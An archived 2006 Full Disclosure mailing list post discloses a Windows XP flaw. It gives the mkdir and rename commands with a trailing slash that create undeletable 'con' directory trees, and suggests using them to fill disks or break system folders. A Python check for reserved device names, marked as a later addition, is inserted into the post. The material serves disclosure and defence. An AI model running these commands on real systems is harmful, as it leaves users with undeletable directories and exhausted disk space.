Full Disclosure mailing list archives

DOS device name handling


From: Klaudiusz Kulik <kulikk () monstrum org>
Date: Mon, 1 May 2006 18:06:22 +0200

    Hi.

* Overview:
A vulnerability exists in Windows XP SP2 (other versions may also be affected),
probably due to an error in the handling of special DOS device names.
In March 2000 Microsoft patched a similar problem in Windows 98:
http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=4C6FD7E5-A66E-4A08-B782-2A64C77B95B6

* Environment:
I tried this on Polish Windows XP SP2 with the latest patches. Command outputs
are translated into English, so they are not identical to those in the English
version of XP.

* Description:
Using simple mkdir and rename commands it is possible to create a directory
structure which then cannot be removed from the disk without special, third
party tools.
Because even an empty directory occupies some amount of disk space, this
vulnerability may be used against a user's machine by creating millions of
prepared, non-erasable directories. Another scenario is renaming a system or
user directory to an invalid name.

* Details:
In theory, Windows does not allow programs to create a directory whose name is a
special DOS device name (e.g. CON, LPT1, COM1, PRN). By simply adding
a slash '/' character at the end of the directory name, that protection fails.

* Example:
Assume we are in the root of drive C:

Creating...
mkdir "/foo/foo/foo/foo"

A valid directory structure C:\foo\foo\foo\foo is created.

... and renaming:
cd \foo\foo\foo
rename "foo" "con/"
cd ..
rename "foo" "con/"
cd ..
rename "foo" "con/"
cd ..
rename "foo" "con/"
C:\

Now the directory structure is:
C:\con\con\con\con

Please note that this is a one-way operation. Renaming from "con/" or
"con" to "foo" does not work. However, if the directory has only one
level (C:\con) and is empty or contains "normal" entries, it is
possible to remove it.


Now, let's try to browse:

C:\>cd "con"
System nie może odnaleźć określonej ścieżki.
[System can not find appropriate path.]
C:\>cd "con/"
Nazwa katalogu jest nieprawidłowa.
[Invalid directory name.]


Let's try to rename:

C:\>rename "con" "foo"
System nie może odnaleźć określonej ścieżki.
[System can not find appropriate path.]
C:\>rename "con/" "foo"
Nie można odnaleźć określonego pliku.
[Could not find appropriate file.]


And finally - removing:

C:\>rmdir /S "con/"
con/, Czy na pewno (T/N)? t
[Are you sure (Y/N)?]
con/\con\con\con\con - Nie można odnaleźć określonego pliku.
con/\con\con\con - Nie można odnaleźć określonego pliku.
con/\con\con - Nie można odnaleźć określonego pliku.
con/\con - Nie można odnaleźć określonego pliku.
[Could not find appropriate file.]

Directory exists.

C:\>erase /S /Q "con"
Nie można odnaleźć \\.\con.
[Could not find \\.\con.]

Note the strange path.

C:\>erase /S /Q "con/"

C:\
Directory *still* exists.

Windows Explorer can browse the directory, but renaming or removing it fails.
It looks like there is no simple way to remove C:\con from the disk.
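A defensive check, added here as an example and not part of the original post: an application that accepts user-supplied file or directory names (an upload handler, an archive extractor) can refuse any path component that maps to a DOS device name, including the trailing-slash form shown above and the "CON.txt"-style variants Win32 also treats as reserved. The reserved-name set is the documented Win32 list; the function and sample paths are this example's own.

```python
import re

# Reserved DOS device names on Windows (case-insensitive): the documented
# Win32 list. A component is compared after normalisation, because the name
# is matched on the base name only ("CON.txt" is still CON) and trailing
# dots, spaces and separators are silently dropped by the filesystem layer.
RESERVED = {"CON", "PRN", "AUX", "NUL", "CLOCK$"}
RESERVED |= {f"COM{i}" for i in range(1, 10)}
RESERVED |= {f"LPT{i}" for i in range(1, 10)}


def _normalise(component: str) -> str:
    # Drop trailing separators, dots and spaces (the "con/" trick in the post).
    name = component.rstrip("/\\. ")
    # Everything after the first dot is an extension; compare the base name.
    name = name.split(".", 1)[0]
    return name.strip().upper()


def reserved_components(path: str) -> list[str]:
    """Return the components of `path` (as written) that resolve to a DOS device.

    Splits on both '/' and '\\' so that Windows and mixed-separator paths are
    handled alike. An empty list means the path contains no reserved name.
    """
    hits = []
    for comp in re.split(r"[\\/]+", path):
        if comp and _normalise(comp) in RESERVED:
            hits.append(comp)
    return hits


def is_safe_name(path: str) -> bool:
    """True when no component of `path` is a reserved device name."""
    return not reserved_components(path)


if __name__ == "__main__":
    # Constructed sample inputs, mirroring the post's rename targets.
    for p in [r"C:\foo\foo\foo\foo", "con/", r"C:\con\con\con\con", "CON.txt"]:
        print(f"{p!r:28} reserved={reserved_components(p)}")
```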

-- 
K.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
